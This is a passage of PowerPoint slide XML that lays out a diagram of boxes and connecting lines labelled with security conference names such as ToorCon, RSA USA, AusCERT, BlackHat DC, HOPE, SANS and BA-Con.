                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36064" name="Line 598"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="339" y="2385"/>
                <a:ext cx="540" cy="292"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36065" name="Rectangle 599"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="230" y="2682"/>
                <a:ext cx="278" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>ToorCon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36066" name="Rectangle 600"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="527" y="2526"/>
                <a:ext cx="352" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36067" name="Rectangle 601"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="527" y="2526"/>
                <a:ext cx="352" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36068" name="Line 602"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="703" y="2304"/>
                <a:ext cx="105" cy="222"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36069" name="Rectangle 603"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="577" y="2532"/>
                <a:ext cx="310" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>RSA USA</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36070" name="Rectangle 604"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4613" y="3636"/>
                <a:ext cx="348" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36071" name="Rectangle 605"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4613" y="3636"/>
                <a:ext cx="348" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36072" name="Line 606"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4787" y="3447"/>
                <a:ext cx="374" cy="189"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35856" name="Rectangle 608"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4660" y="3642"/>
              <a:ext cx="315" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="700">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AusCERT</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35857" name="Rectangle 609"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1536" y="2427"/>
              <a:ext cx="422" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35858" name="Rectangle 610"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1536" y="2427"/>
              <a:ext cx="422" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35859" name="Line 611"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1521" y="2272"/>
              <a:ext cx="226" cy="155"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35860" name="Rectangle 612"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1582" y="2431"/>
              <a:ext cx="395" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="700">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>BlackHat DC</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35861" name="Rectangle 613"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="2274"/>
              <a:ext cx="306" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35862" name="Rectangle 614"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="2274"/>
              <a:ext cx="306" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35863" name="Line 615"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1575" y="2223"/>
              <a:ext cx="162" cy="51"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35864" name="Rectangle 616"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1657" y="2276"/>
              <a:ext cx="208" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="700">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HOPE</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35865" name="Rectangle 617"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4920" y="2826"/>
              <a:ext cx="251" cy="83"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35866" name="Rectangle 618"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4920" y="2826"/>
              <a:ext cx="251" cy="83"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35867" name="Line 619"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4429" y="2909"/>
              <a:ext cx="616" cy="139"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35868" name="Rectangle 620"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4986" y="2831"/>
              <a:ext cx="160" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="700">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>BCS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35869" name="Rectangle 621"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="774" y="2681"/>
              <a:ext cx="351" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35870" name="Rectangle 622"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="774" y="2681"/>
              <a:ext cx="351" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35871" name="Line 623"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="879" y="2385"/>
              <a:ext cx="70" cy="296"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="2" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35872" name="Rectangle 624"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="871" y="2687"/>
              <a:ext cx="203" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="700">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SANS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Line 499"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="5791200"/>
            <a:ext cx="896938" cy="144463"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Line 499"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="5791200"/>
            <a:ext cx="896938" cy="373063"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Line 499"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5410200"/>
            <a:ext cx="685800" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35846" name="Rectangle 498"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3208338" y="5935663"/>
            <a:ext cx="865187" cy="131762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35847" name="Rectangle 502"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="5943600"/>
            <a:ext cx="312738" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BA-Con</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35848" name="Rectangle 498"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="6164263"/>
            <a:ext cx="865188" cy="131762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35849" name="Rectangle 502"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6172200"/>
            <a:ext cx="403225" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
